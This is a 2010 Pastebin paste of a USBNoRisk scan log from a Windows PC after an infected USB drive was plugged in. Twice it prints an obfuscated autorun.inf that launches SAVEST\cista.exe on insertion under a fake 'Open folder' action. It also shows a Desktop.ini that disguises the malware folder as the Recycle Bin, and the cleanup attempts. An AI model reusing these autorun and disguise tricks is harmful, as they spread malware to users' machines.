Share Pastebin
Guest
Public paste!

Untitled

By: a guest | Mar 21st, 2010 | Syntax: None | Size: 6.94 KB | Hits: 263 | Expires: Never
Copy text to clipboard
  1. USBNoRisk 2.5 (26 July 2009) by bobby
  2.  
  3. Started at 3/21/2010 12:15:43 PM
  4.  
  5. Searching for connected USB Mass storage...
  6. ----------------------------------------
  7. ========================================
  8.  
  9. Searching for other storage...
  10. ----------------------------------------
  11. C:  {b24c4562-4f04-11de-9e38-806d6172696f}
  12. D:  {b24c4563-4f04-11de-9e38-806d6172696f}
  13. ========================================
  14.  
  15.  
  16. Scanning fixed storage...
  17. ----------------------------------------
  18.  
  19. No blocked files found on C:
  20. No Autorun.inf files found on C:
  21. No mountpoint found for C:
  22. No mountpoint found for b24c4562-4f04-11de-9e38-806d6172696f
  23. No Desktop.ini files found on C:
  24. ----------------------------------------
  25.  
  26. No blocked files found on D:
  27. No Autorun.inf files found on D:
  28. No mountpoint found for D:
  29. No mountpoint found for b24c4563-4f04-11de-9e38-806d6172696f
  30. No Desktop.ini files found on D:
  31. ----------------------------------------
  32.  
  33. ========================================
  34. Initial scan finished!
  35. ========================================
  36.  
  37.  
  38. [b]New device connected at[/b] 3/21/2010 12:16:04 PM
  39.  
  40. Scanning for connected USB mass storage...
  41. ----------------------------------------
  42. H:  {6d6ee6e4-acec-11de-b18d-00186811054d}
  43. Added H:
  44. ========================================
  45.  
  46. Scanning USB mass storage for files...
  47. ----------------------------------------
  48. Blocked file found: H:\autorun.inf.blocked
  49. ----------------------------------------
  50. Content of H:\autorun.inf.blocked
  51. ----------------------------------------
  52. [autorun
  53. @pornic
  54. open=SAVEST///cista.exe
  55. #djkadjkasDJasDKJasdkl
  56. action=Open folder to view files using Windows Explorer
  57. :1232ko3k
  58. $MJ4k
  59. icon=%SystemRoot%\system32\SHELL32.dll,4
  60. !ksdkjfasifkas
  61. Shell\open\command=SAVEST///cista.exe
  62. ^jkasdjaskldjasldjaskl
  63. shell\open\command=SAVEST///cista.exe
  64. &dfasjfasfkwfwfk
  65. USEAUTOPLAY=1
  66. %asfkjawjifikWQFjFijw
  67. ----------------------------------------
  68.  
  69. Files referenced from H:\autorun.inf.blocked
  70. ----------------------------------------
  71. None
  72. ----------------------------------------
  73.  
  74. ----------------------------------------
  75. autorun.inf found on H:
  76. ----------------------------------------
  77. File H:\autorun.inf renamed successfully
  78.  
  79. Content of H:\autorun(1).inf.blocked
  80. ----------------------------------------
  81. [autorun
  82. @pornic
  83. open=SAVEST///cista.exe
  84. #djkadjkasDJasDKJasdkl
  85. action=Open folder to view files using Windows Explorer
  86. :1232ko3k
  87. $MJ4k
  88. icon=%SystemRoot%\system32\SHELL32.dll,4
  89. !ksdkjfasifkas
  90. Shell\open\command=SAVEST///cista.exe
  91. ^jkasdjaskldjasldjaskl
  92. shell\open\command=SAVEST///cista.exe
  93. &dfasjfasfkwfwfk
  94. USEAUTOPLAY=1
  95. %asfkjawjifikWQFjFijw
  96. ----------------------------------------
  97.  
  98. Files referenced from H:\autorun(1).inf.blocked
  99. ----------------------------------------
  100. None
  101. ----------------------------------------
  102.  
  103. No mountpoint found for 6d6ee6e4-acec-11de-b18d-00186811054d
  104. ----------------------------------------
  105.  
  106. ----------------------------------------
  107. Desktop.ini found at H:\SAVEST\ contains interesting CLSID string
  108. ----------------------------------------
  109. [.ShellClassInfo]
  110. CLSID={645FF040-5081-101B-9F08-00AA002F954E}
  111. ----------------------------------------
  112. HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E},InfoTip =  @%SystemRoot%\system32\SHELL32.dll,-22915
  113. HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E},IntroText =  @%SystemRoot%\system32\SHELL32.dll,-31748
  114. HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E},LocalizedString =  @%SystemRoot%\system32\SHELL32.dll,-8964
  115. HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon,@ =  %SystemRoot%\System32\shell32.dll,31
  116. HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon,Empty =  %SystemRoot%\System32\shell32.dll,31
  117. HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon,Full =  %SystemRoot%\System32\shell32.dll,32
  118. HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\InProcServer32,@ =  shell32.dll
  119. HKLM\Software\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E},InfoTip =  @%SystemRoot%\system32\SHELL32.dll,-22915
  120. HKLM\Software\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E},IntroText =  @%SystemRoot%\system32\SHELL32.dll,-31748
  121. HKLM\Software\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E},LocalizedString =  @%SystemRoot%\system32\SHELL32.dll,-8964
  122. HKLM\Software\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon,@ =  %SystemRoot%\System32\shell32.dll,31
  123. HKLM\Software\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon,Empty =  %SystemRoot%\System32\shell32.dll,31
  124. HKLM\Software\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon,Full =  %SystemRoot%\System32\shell32.dll,32
  125. HKLM\Software\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\InProcServer32,@ =  shell32.dll
  126. ----------------------------------------
  127.  
  128. No mimics found on drive H:
  129. ========================================
  130.  
  131.  
  132. Processing script
  133. ----------------------------------------
  134. 6d6ee6e4-acec-11de-b18d-00186811054d
  135. Drive letter for GUID: H:
  136. SectionStart = 0
  137. SectionEnd = 2
  138. ----------------------------------------
  139. Delete folder tree H:\SAVEST:
  140. ----------------------------------------
  141. File lock detected:
  142. USBNoRisk cannot find what locked the file
  143. Delete: H:\SAVEST\cista.exe > Error!
  144. Delete: H:\SAVEST\Desktop.ini > Done!
  145. Delete: H:\SAVEST > Error!
  146. Delete: H:\SAVEST > Error!
  147. ----------------------------------------
  148. Deleting blocked files:
  149. ----------------------------------------
  150. Delete: H:\autorun.inf.blocked > Done!
  151. Delete: H:\autorun(1).inf.blocked > Done!
  152. ----------------------------------------
  153.  
  154. ========================================
  155. Removed H:
  156. ========================================
  157.  
  158.  
  159. [b]New device connected at[/b] 3/21/2010 12:43:22 PM
  160.  
  161. Scanning for connected USB mass storage...
  162. ----------------------------------------
  163. H:  {6d6ee6e4-acec-11de-b18d-00186811054d}
  164. Added H:
  165. ========================================
  166.  
  167. Scanning USB mass storage for files...
  168. ----------------------------------------
  169. No blocked files found on H:
  170. ----------------------------------------
  171. No Autorun.inf files found on H:
  172. No mountpoint found for 6d6ee6e4-acec-11de-b18d-00186811054d
  173. ----------------------------------------
  174.  
  175. No Desktop.ini files found on H:
  176. ----------------------------------------
  177.  
  178. No mimics found on drive H:
  179. ========================================
  180.  
  181. Processing script
  182. ----------------------------------------
  183. 6d6ee6e4-acec-11de-b18d-00186811054d
  184. Drive letter for GUID: H:
  185. SectionStart = 0
  186. SectionEnd = 2
  187. ----------------------------------------
  188. Delete folder tree H:\SAVEST:
  189. ----------------------------------------
  190. File lock detected:
  191. USBNoRisk cannot find what locked the file
  192. Delete: H:\SAVEST\cista.exe > Error!
  193. Delete: H:\SAVEST > Error!
  194. Delete: H:\SAVEST > Error!
  195. ----------------------------------------
  196. Deleting blocked files:
  197. ----------------------------------------
  198. None
  199. ----------------------------------------
  200.  
  201. ========================================
  202. Scan finished!
  203. ========================================